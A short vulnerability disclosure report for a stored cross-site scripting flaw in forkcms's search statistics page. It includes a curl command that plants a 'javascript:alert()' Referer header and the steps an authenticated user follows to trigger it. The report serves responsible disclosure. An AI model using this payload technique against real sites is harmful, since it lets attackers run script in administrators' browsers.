Cross-site Scripting (XSS) - Stored in forkcms/forkcms


Reported on

Apr 19th 2021

✍️ Description

The forkcms is vulnerable to XSS through search request. It is possible to set the HTTP referer header to javascript:.

🕵️‍♂️ Proof of Concept

Execute the following command (localhost):

curl -H 'Referer: javascript:alert()' 'http://localhost/search?form=search&q_widget=poc&submit=search'

With an authenticated user, access http://localhost/private/en/search/statistics.

Click on javascript:alert().

PoC image:

💥 Impact

The attackers can execute arbitrary JS code.

to join this conversation